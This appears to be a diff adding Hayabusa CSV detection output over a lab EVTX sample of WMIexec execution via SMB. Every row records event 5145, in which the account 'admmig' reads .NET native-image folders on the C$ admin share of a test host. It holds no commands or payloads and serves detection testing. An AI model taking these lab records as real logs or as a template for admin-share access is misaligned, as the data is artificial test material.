+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
